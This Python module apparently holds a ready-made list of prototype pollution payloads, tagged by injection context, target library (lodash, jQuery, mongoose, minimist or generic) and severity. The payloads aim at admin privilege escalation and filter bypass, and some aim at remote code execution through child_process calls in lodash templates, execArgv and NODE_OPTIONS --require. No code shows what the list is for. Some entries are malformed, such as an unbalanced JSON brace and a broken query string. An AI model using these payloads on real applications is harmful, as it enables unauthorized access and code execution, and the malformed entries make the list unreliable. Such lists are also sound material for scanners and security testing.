"""prototype_pollution_payloads — generated dev-time by Claude. Webapp module asset.
"""

PROTOTYPE_POLLUTION_PAYLOADS = [{'payload': '{"__proto__":{"polluted":true}}', 'context': 'json_body', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"isAdmin":true}}', 'context': 'json_body', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"toString":"pwned"}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"hasOwnProperty":"hacked"}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"valueOf":"evil"}}', 'context': 'json_body', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"NODE_OPTIONS":"--require /proc/self/fd/0"}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"env":{"NODE_OPTIONS":"--inspect=0.0.0.0"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"shell":"node"}}', 'context': 'json_body', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"execPath":"/bin/sh"}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"debug":true}}', 'context': 'json_body', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"admin":true}}', 'context': 'json_body', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"role":"superadmin"}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"authorized":true}}', 'context': 'json_body', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"pid":1}}', 'context': 'json_body', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"type":"Buffer","data":[104,101,108,108,111]}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"source":".*","flags":"g"}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"__proto__":{"__defineGetter__":"polluted"}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"constructor":{"prototype":{"pwned":true}}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"mainModule":{"require":"os"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"argv0":"/bin/bash"}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"polluted":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"constructor":{"prototype":{"isAdmin":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"shell":"/bin/sh"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"NODE_OPTIONS":"--require /tmp/evil"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"role":"admin"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"debug":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"constructor":{"prototype":{"authorized":1}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"type":"admin"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"constructor":{"prototype":{"env":{"NODE_OPTIONS":"--eval=process.exit(0)"}}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"execArgv":["--eval","require(\'child_process\').exec(\'id\')"]}}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"sanitize":false}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"constructor":{"prototype":{"bypass":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"constructor":{"prototype":{"silent":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"constructor":{"prototype":{"inherit":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"constructor":{"prototype":{"overwrite":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"a":{"__proto__":{"x":1}}}', 'context': 'json_body', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': '{"a":{"__proto__":{"isAdmin":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"user":{"__proto__":{"role":"admin"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"config":{"__proto__":{"debug":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"data":{"__proto__":{"shell":"/bin/sh"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"options":{"__proto__":{"env":{"NODE_OPTIONS":"--require /tmp/x"}}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"nested":{"obj":{"__proto__":{"polluted":true}}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"level1":{"level2":{"__proto__":{"owned":true}}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"body":{"__proto__":{"authorized":true}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"params":{"__proto__":{"type":"superuser"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"filter":{"__proto__":{"constructor":{"prototype":{"x":1}}}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"src":{"__proto__":{"NODE_OPTIONS":"--inspect"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"meta":{"__proto__":{"toString":"hacked"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': '{"req":{"__proto__":{"headers":{"x-admin":"true"}}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"input":{"__proto__":{"execPath":"/bin/bash"}}}',
  'context': 'json_body',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': 'a[__proto__][polluted]=true', 'context': 'query_string', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': 'a[__proto__][isAdmin]=true', 'context': 'query_string', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': 'a[__proto__][role]=admin', 'context': 'query_string', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': 'a[__proto__][debug]=1', 'context': 'query_string', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': 'user[__proto__][authorized]=1', 'context': 'query_string', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': 'x[__proto__][shell]=/bin/sh', 'context': 'query_string', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': 'obj[__proto__][NODE_OPTIONS]=--require /tmp/evil',
  'context': 'query_string',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': 'a[constructor][prototype][polluted]=1',
  'context': 'query_string',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': 'a[constructor][prototype][isAdmin]=true',
  'context': 'query_string',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': 'q[__proto__][type]=admin', 'context': 'query_string', 'library': 'generic', 'severity': 'CRITICAL'},
 {'payload': 'search[__proto__][bypass]=1', 'context': 'query_string', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': 'filter[__proto__][execPath]=/bin/bash',
  'context': 'query_string',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': 'sort[__proto__][toString]=malicious',
  'context': 'query_string',
  'library': 'generic',
  'severity': 'HIGH'},
 {'payload': 'data[__proto__][silent]=true', 'context': 'query_string', 'library': 'generic', 'severity': 'HIGH'},
 {'payload': 'input[__proto__][argv0]=/bin/bash',
  'context': 'query_string',
  'library': 'generic',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"iteratee":"_. polluted"}}',
  'context': 'json_body',
  'library': 'lodash',
  'severity': 'HIGH'},
 {'payload': '{"__proto__":{"sourceURL":"\\u2028\\u2029alert(1)"}}',
  'context': 'json_body',
  'library': 'lodash',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"merge":"polluted"}}}',
  'context': 'json_body',
  'library': 'lodash',
  'severity': 'HIGH'},
 {'payload': '{"__proto__":{"customizer":"malicious"}}',
  'context': 'json_body',
  'library': 'lodash',
  'severity': 'HIGH'},
 {'payload': '{"__proto__":{"defaultsDeep":true}}', 'context': 'json_body', 'library': 'lodash', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"template":"<%= process.mainModule.require(\'child_process\').execSync(\'id\') %>"}}',
  'context': 'json_body',
  'library': 'lodash',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"variable":"pwned"}}', 'context': 'json_body', 'library': 'lodash', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"extend":"hacked"}}', 'context': 'json_body', 'library': 'jquery', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"jquery":"polluted"}}', 'context': 'json_body', 'library': 'jquery', 'severity': 'HIGH'},
 {'payload': '{"constructor":{"prototype":{"isReady":true}}}',
  'context': 'json_body',
  'library': 'jquery',
  'severity': 'HIGH'},
 {'payload': '{"__proto__":{"expando":"jQuery_polluted"}}',
  'context': 'json_body',
  'library': 'jquery',
  'severity': 'HIGH'},
 {'payload': '{"__proto__":{"readyWait":0}}', 'context': 'json_body', 'library': 'jquery', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"__where":{"$gt":""}}}',
  'context': 'json_body',
  'library': 'mongoose',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"$where":"this.constructor.constructor(\'return process\')().exit()"}}',
  'context': 'json_body',
  'library': 'mongoose',
  'severity': 'CRITICAL'},
 {'payload': '{"constructor":{"prototype":{"$where":"1===1"}}}',
  'context': 'json_body',
  'library': 'mongoose',
  'severity': 'CRITICAL'},
 {'payload': '{"__proto__":{"castError":true}}', 'context': 'json_body', 'library': 'mongoose', 'severity': 'HIGH'},
 {'payload': '{"__proto__":{"strict":false}}', 'context': 'json_body', 'library': 'mongoose', 'severity': 'CRITICAL'},
 {'payload': '_ [__proto__][_=true', 'context': 'query_string', 'library': 'minimist', 'severity': 'HIGH'},
 {'payload': '__proto__[polluted]=true&__proto__[debug]=1',
  'context': 'query_string',
  'library': 'minimist',
  'severity': 'HIGH'},
 {'payload': '__proto__[isAdmin]=true', 'context': 'query_string', 'library': 'minimist', 'severity': 'CRITICAL'},
 {'payload': '__proto__[shell]=/bin/sh&__proto__[env][NODE_OPTIONS]=--require /tmp/evil',
  'context': 'query_string',
  'library': 'minimist',
  'severity': 'CRITICAL'},
 {'payload': 'constructor[prototype][polluted]=true&constructor[prototype][role]=admin',
  'context': 'query_string',
  'library': 'minimist',
  'severity': 'CRITICAL'}]
